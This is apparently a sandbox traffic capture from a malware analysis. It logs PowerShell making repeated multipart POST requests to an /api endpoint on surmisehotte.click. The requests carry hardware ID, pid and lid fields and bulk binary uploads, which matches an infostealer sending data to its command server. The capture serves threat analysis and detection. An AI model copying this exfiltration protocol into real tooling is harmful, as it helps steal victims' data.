                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 4e 4c 6c 36 4b 6c 73 71 47 47 6c 64 56 33 59 31 7a 4a 59 74 42 31 4c 41 54 73 4c 79 2f 4e 4d 38 6e 2b 77 2f 56 4e 43 54 67 75 70 78 2b 54 31 6d 4f 6e 68 49 5a 56 68 41 4f 52 72 4d 7a 43 68 4a 45 73 42 64 7a 4c 50 38 78 48 62 58 73 6e 34 54 6a 74 54 41 72 58 61 30 62 33 70 38 49 78 35 6e 46 57 34 4b 4f 4e 6d 48 50 6b 52 65 73 55 2b 47 76 4b 6e 52 4a 6f 6a 66 44 6e 36 4f 6b 34 6a 75 63 34 5a 72 61 33 6f 75 44 79 51 63 45 43 78 56 6b 38 41 44 56 52 75 51 51 63 4c 6b 2f 4e 35 32 31 36 45 39 51 5a 75 45 6d 36 45 32 72 58 6f 6f 5a 57 34 52 4a 45 51 51 62 45 61 46 77 44 77 48 52 4d 41 46 6a 4b 65 39 30 54 69 4d 38 79 4a 56 6e 34 4b 62 71 67 2b 4a 55 48 70 39 4d 41 73 6d 59 31 30 77 41 39 36 44 50 6b 41 69 76 6d 2b 51 72 61 7a 52 64 4b 50 6d 50 56 2b 69 71 71 2f
                                                                      Data Ascii: NLl6KlsqGGldV3Y1zJYtB1LATsLy/NM8n+w/VNCTgupx+T1mOnhIZVhAORrMzChJEsBdzLP8xHbXsn4TjtTArXa0b3p8Ix5nFW4KONmHPkResU+GvKnRJojfDn6Ok4juc4Zra3ouDyQcECxVk8ADVRuQQcLk/N5216E9QZuEm6E2rXooZW4RJEQQbEaFwDwHRMAFjKe90TiM8yJVn4Kbqg+JUHp9MAsmY10wA96DPkAivm+QrazRdKPmPV+iqq/


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649971104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:30:59 UTC280OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=70P8X59W1L48VX
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12836
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:30:59 UTC12836OUTData Raw: 2d 2d 37 30 50 38 58 35 39 57 31 4c 34 38 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 32 41 41 36 42 43 44 35 34 42 35 43 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 30 50 38 58 35 39 57 31 4c 34 38 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 30 50 38 58 35 39 57 31 4c 34 38 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 37 30 50 38 58 35 39
                                                                      Data Ascii: --70P8X59W1L48VXContent-Disposition: form-data; name="hwid"FF2AA6BCD54B5C55AC8923850305D13E--70P8X59W1L48VXContent-Disposition: form-data; name="pid"2--70P8X59W1L48VXContent-Disposition: form-data; name="lid"yJEcaG--singl6--70P8X59
                                                                      2024-12-24 07:31:00 UTC1133INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:31:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=rv00spboarqtfmfv6o3i3tdpu0; expires=Sat, 19 Apr 2025 01:17:39 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XaVUjK2XmFvUUU1TrUjEEBVH4swrqPOZ%2FeDV%2FhaF67hFj3awSeZW6iP1EAOMBnwCuYRksuytm87QqtdKNA0V6ghZWdVCAghXnNGujpEoDC5bjoBj3%2B8bjDXg1CsgAh0E2%2Flf8vg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3a2e977de95-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1598&rtt_var=640&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13774&delivery_rate=1827284&cwnd=240&unsent_bytes=0&cid=b1a8535080f48c73&ts=929&x=0"
                                                                      2024-12-24 07:31:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2024-12-24 07:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649976104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:31:01 UTC281OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=8R69TJHIZZJ6HDG
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15088
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:31:01 UTC15088OUTData Raw: 2d 2d 38 52 36 39 54 4a 48 49 5a 5a 4a 36 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 32 41 41 36 42 43 44 35 34 42 35 43 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 52 36 39 54 4a 48 49 5a 5a 4a 36 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 52 36 39 54 4a 48 49 5a 5a 4a 36 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 38 52 36 39
                                                                      Data Ascii: --8R69TJHIZZJ6HDGContent-Disposition: form-data; name="hwid"FF2AA6BCD54B5C55AC8923850305D13E--8R69TJHIZZJ6HDGContent-Disposition: form-data; name="pid"2--8R69TJHIZZJ6HDGContent-Disposition: form-data; name="lid"yJEcaG--singl6--8R69
                                                                      2024-12-24 07:31:02 UTC1142INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:31:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=pkl5vt2hbu27jd18gs3b1bdd02; expires=Sat, 19 Apr 2025 01:17:41 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WnSd%2B54U1u%2BVPbcaA%2B4VVL%2BsWWQkVFfcnDwGulSNQlOFr%2BQj%2BVJsJOplLvZHsBNf7gGuP3DRsQmShkht%2B2dv%2BZR1y5X77%2FB33aNuhxQOkSLku7QsLD0kPf2VbchXMH54IuNTW4g%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3b07d4542e9-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1640&rtt_var=627&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16027&delivery_rate=1726788&cwnd=240&unsent_bytes=0&cid=22c93df8cb1e3a9d&ts=870&x=0"
                                                                      2024-12-24 07:31:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2024-12-24 07:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649982104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:31:04 UTC282OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=PK2RLULDFG4MCMDH
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 19952
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:31:04 UTC15331OUTData Raw: 2d 2d 50 4b 32 52 4c 55 4c 44 46 47 34 4d 43 4d 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 32 41 41 36 42 43 44 35 34 42 35 43 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 4b 32 52 4c 55 4c 44 46 47 34 4d 43 4d 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 4b 32 52 4c 55 4c 44 46 47 34 4d 43 4d 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 50
                                                                      Data Ascii: --PK2RLULDFG4MCMDHContent-Disposition: form-data; name="hwid"FF2AA6BCD54B5C55AC8923850305D13E--PK2RLULDFG4MCMDHContent-Disposition: form-data; name="pid"3--PK2RLULDFG4MCMDHContent-Disposition: form-data; name="lid"yJEcaG--singl6--P
                                                                      2024-12-24 07:31:04 UTC4621OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00
                                                                      Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                      2024-12-24 07:31:05 UTC1137INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:31:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=mocf0gppq1sot3163upegjn16h; expires=Sat, 19 Apr 2025 01:17:43 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yq5DHTfCKOsAlmRjvS3kLGnehV5GujhVDu4xqBUz0HU3O5mc9aTBrgNOU56LwMh%2Fh0gvuoLOsJfYqvnH6T%2FPdTLRvd%2FyHKHcuBmW%2F5ZqYVB3e7Gn%2FHMDCsQtCm%2FTTbgQdAt2BnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3bfae3ede95-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1648&rtt_var=652&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20914&delivery_rate=1634938&cwnd=240&unsent_bytes=0&cid=3bfb7e3645891e3c&ts=925&x=0"
                                                                      2024-12-24 07:31:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2024-12-24 07:31:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.649989104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:31:06 UTC274OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=G3GD1W4EG
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1172
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:31:06 UTC1172OUTData Raw: 2d 2d 47 33 47 44 31 57 34 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 32 41 41 36 42 43 44 35 34 42 35 43 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 33 47 44 31 57 34 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 33 47 44 31 57 34 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 47 33 47 44 31 57 34 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                      Data Ascii: --G3GD1W4EGContent-Disposition: form-data; name="hwid"FF2AA6BCD54B5C55AC8923850305D13E--G3GD1W4EGContent-Disposition: form-data; name="pid"1--G3GD1W4EGContent-Disposition: form-data; name="lid"yJEcaG--singl6--G3GD1W4EGContent-Dis
                                                                      2024-12-24 07:31:07 UTC1128INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:31:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=pu86ofboq80jcqce0tdbua2et8; expires=Sat, 19 Apr 2025 01:17:45 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2NLwxf7cYX7E70OPc0%2B8wWGeLcrhJSjoHs3RRVHRmFXm2wn8nQsBXbGgO%2BjinqWamPqCYgSEqaJ17In80q6AhRduDdqjljvkqakPi239RezykjSSg3yRncs8%2FxqWZKV1x6S10I%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3ce0acdde95-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1607&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2082&delivery_rate=1771844&cwnd=240&unsent_bytes=0&cid=ed222390fad70aa6&ts=771&x=0"
                                                                      2024-12-24 07:31:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2024-12-24 07:31:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.649995104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:31:09 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=N7DVGC5TCZBQPB6BI
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 569242
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: 2d 2d 4e 37 44 56 47 43 35 54 43 5a 42 51 50 42 36 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 32 41 41 36 42 43 44 35 34 42 35 43 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 37 44 56 47 43 35 54 43 5a 42 51 50 42 36 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 37 44 56 47 43 35 54 43 5a 42 51 50 42 36 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a
                                                                      Data Ascii: --N7DVGC5TCZBQPB6BIContent-Disposition: form-data; name="hwid"FF2AA6BCD54B5C55AC8923850305D13E--N7DVGC5TCZBQPB6BIContent-Disposition: form-data; name="pid"1--N7DVGC5TCZBQPB6BIContent-Disposition: form-data; name="lid"yJEcaG--singl6
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: 71 85 a5 68 15 f0 57 a8 5e d9 c6 9b 3e fa 20 df af 5b 4b 7f 2f a8 0b c8 f8 b6 ef 6b b7 1a 80 a7 31 27 c0 9b c4 99 80 e5 6b fc 16 1e 26 34 c1 4d c4 1b d2 4c ad 76 77 84 e9 7e c8 d5 88 72 13 f4 af fe 21 cc c1 6f 07 92 26 ff 90 e4 5d 59 49 f1 4e d2 06 d3 e0 d9 91 64 a2 b5 03 bc 4f 54 e6 17 25 1e 10 d5 19 a1 dc 91 08 6d 74 4b 47 af 86 2b 64 26 09 6e b6 a5 2a 4b e2 7c d2 cf e0 2d 2d 9e b4 02 41 75 86 87 17 c9 59 a1 d9 18 cf 02 df 23 7d 5b d1 54 58 e7 bf 90 22 0c 66 f2 73 b4 8c be 78 67 24 31 26 1a a1 f9 89 14 94 51 0b ee 87 ab 6d 7b 0e b9 48 11 fc b5 62 23 17 bd 5f 57 a0 e9 52 28 3f 9b 9c 30 7c 53 64 28 b2 a2 07 55 6d 3b 68 93 5d 69 cf d7 32 2e 6f 26 b7 fa 1c 4d cc 8c 30 de 2c df b7 47 e6 7e f9 16 f2 de c6 a7 ba cf 52 63 7d 13 f8 77 e0 6e aa 67 a1 28 55 2f f2
                                                                      Data Ascii: qhW^> [K/k1'k&4MLvw~r!o&]YINdOT%mtKG+d&n*K|--AuY#}[TX"fsxg$1&Qm{Hb#_WR(?0|Sd(Um;h]i2.o&M0,G~Rc}wng(U/
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: 47 18 26 75 35 5a 5b 2b 6d 98 68 6f 91 02 4a 9d 49 63 68 d7 cf c3 92 14 3b c9 ad 9f 26 65 d0 bf 56 26 e2 89 fd dc e6 7f 44 cc a8 86 cb 49 5e a6 f9 e7 29 1b b9 79 a1 75 35 39 37 07 84 7b 12 01 7f f3 7f 9f 16 6b 86 8b 3f 2b d0 7b c4 02 56 87 44 ca 2a 59 15 cd 43 41 93 e9 2c 57 11 ce a0 b1 ae 67 85 5d 59 e0 b5 0e b0 90 b8 15 3e 13 ae f7 53 32 e0 e3 8f f9 4a 01 8d 0f 9a 70 8d 46 d8 fc 01 f6 9d f9 90 9d a1 f1 b1 67 28 e1 ef 73 ed 02 1a 3e 6e ad 32 86 ff fb 25 64 ea f8 fd c5 7a 06 a5 32 ec b5 dd 1b 8e c5 36 ab 46 27 25 d8 61 2e 9c 3d e3 8f f5 7e bf 99 10 30 d8 e6 aa e1 17 60 74 b0 59 cd a9 7a f0 57 ef e2 29 71 44 60 b5 68 7b 0d 55 f8 7b 75 cc da 0d 2e 3f 1e be 99 74 63 1f 8a d1 74 21 d8 7a f3 88 88 98 d7 0a ed af 2f 8f 1d 15 c9 43 1f 3c a7 a2 db 1e bf d9 81 a2
                                                                      Data Ascii: G&u5Z[+mhoJIch;&eV&DI^)yu597{k?+{VD*YCA,Wg]Y>S2JpFg(s>n2%dz26F'%a.=~0`tYzW)qD`h{U{u.?tct!z/C<
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: fe c8 4c 62 48 b4 61 4c ae f3 b1 0f ad 2f 15 97 a6 9c 9b 08 85 42 be 1c 2f 09 fb b4 98 bb 4a 59 fe c8 9b a7 a1 6f 4a 3f bb 63 64 df a4 db 81 d8 8a 75 66 9e 8e 70 13 4d a9 e7 3f 23 e5 16 f9 48 75 bc 20 e3 c8 59 e7 a8 10 a9 ad 7e a3 38 e0 d9 a2 d9 01 5b b4 37 36 d5 cd e4 21 07 5f 6c 31 21 b6 c9 92 43 2e 45 26 67 de f6 9b 42 5f 2d e9 d5 e1 8a 6d 1d 60 b9 6d 6b d0 79 ee c4 ff 3b ab 3b fc 6f f1 61 5a 62 2f f3 78 8f fe d7 ad 29 09 1d a4 ee 33 96 36 37 c9 4f 89 c0 fb fc 8e f2 2f a3 84 a9 c3 f8 56 6c 8b 3b 1f fc b4 96 58 de 36 89 78 83 24 40 24 63 b8 07 1e f1 b7 e0 5a 94 04 f6 60 5d ae 3b 8f d8 e7 71 ab 52 4b c7 c6 2f 95 b6 1c 24 eb e9 b1 03 7f 75 58 d1 11 d1 d7 27 ae 2b 90 7f 76 ac c4 4e 9c a5 18 cf 14 8d 1b b8 fe 04 17 c7 8e f7 31 36 b4 36 43 79 13 c7 94 a8 a3
                                                                      Data Ascii: LbHaL/B/JYoJ?cdufpM?#Hu Y~8[76!_l1!C.E&gB_-m`mky;;oaZb/x)367O/Vl;X6x$@$cZ`];qRK/$uX'+vN166Cy
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: aa 30 70 81 b9 e1 79 ad c5 df 12 63 29 63 89 d5 f3 69 d2 d2 38 11 23 aa fa 2e a8 f3 db c3 db c7 13 59 c2 cc 8e ff 30 44 51 da 60 fb 89 32 67 05 de 80 ff df 15 be 33 d6 44 08 66 8b c0 93 60 b5 07 e1 86 32 c0 be 0b 3e f4 be b2 e0 d0 3f 13 05 ea c8 31 41 ea 2e c9 76 f6 d3 73 89 b7 c6 29 81 a0 b0 19 36 cd 8f 3b dc 37 4f e7 2e fd d0 8f 80 d6 20 a7 48 26 b2 f0 70 17 e6 b4 7d 2e 03 55 9b de f0 f0 02 eb 52 1c 46 9b 73 0a 9d 7b 96 f6 1a b2 96 b3 1f dd 25 30 03 eb ce a6 38 75 e9 1b 4f c9 46 92 af 48 6b 97 4e 52 2d be 66 a4 71 9b 64 43 7b fa dd 5d 08 e9 2b 22 44 0c e4 eb 82 ff b2 70 70 13 1d 84 b6 70 eb 4a 15 94 52 4a 6e fd 29 e7 de 6b 4c 26 35 74 8a d8 c1 4f e6 1f 28 71 9b 4f d6 66 65 1a 02 0f 77 9e 9b db b7 f7 9e 8b a3 77 d5 f6 3e 7b 01 ad f7 53 99 16 60 fa a1 a9
                                                                      Data Ascii: 0pyc)ci8#.Y0DQ`2g3Df`2>?1A.vs)6;7O. H&p}.URFs{%08uOFHkNR-fqdC{]+"DpppJRJn)kL&5tO(qOfeww>{S`
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: b4 73 ef 45 5e 20 1e 48 71 4f fa 55 33 06 4f 5c a3 fa b5 0d b5 19 32 76 4c bb 35 e0 5a 73 6c cd 70 cb 7f 1b 64 04 62 ae 8a b8 eb 0c 88 b5 16 44 8c 1e d3 5f bb a5 b7 66 f6 2f 73 1b 47 fb 06 a8 fb 85 1b cb b9 40 91 06 e3 09 54 9a c9 fd c8 ee 77 0c 63 b1 64 50 28 b4 eb 3e 5b 28 a0 e5 c5 42 cb 7b 42 33 89 16 b8 59 11 f8 e2 60 ab 90 29 74 6d eb b9 46 dd 3e cf a7 b3 3e a2 0c 17 de 06 5d 13 cb 84 61 5b d4 6f 8d 8f 0e be 39 9b a1 07 a6 a5 53 e4 50 17 fd ec 31 d9 c2 a4 7c ea 19 23 22 b9 45 18 7f 66 46 35 83 8d fa b8 91 27 46 1d 86 54 dd 6a e4 a5 ea 2b 51 15 f6 1f df 2e d7 e0 3e a8 15 7a 9c a5 64 a8 de 8f 2b a4 7d b4 b4 0c 14 ff ba bd 21 24 42 5f ab 29 d4 a4 3a 09 be ed bf 16 70 3f c3 18 f5 ce 91 29 08 7f 78 92 19 02 74 30 a4 d7 af ec 4f 47 95 36 45 ad 24 a0 10 81
                                                                      Data Ascii: sE^ HqOU3O\2vL5ZslpdbD_f/sG@TwcdP(>[(B{B3Y`)tmF>>]a[o9SP1|#"EfF5'FTj+Q.>zd+}!$B_):p?)xt0OG6E$
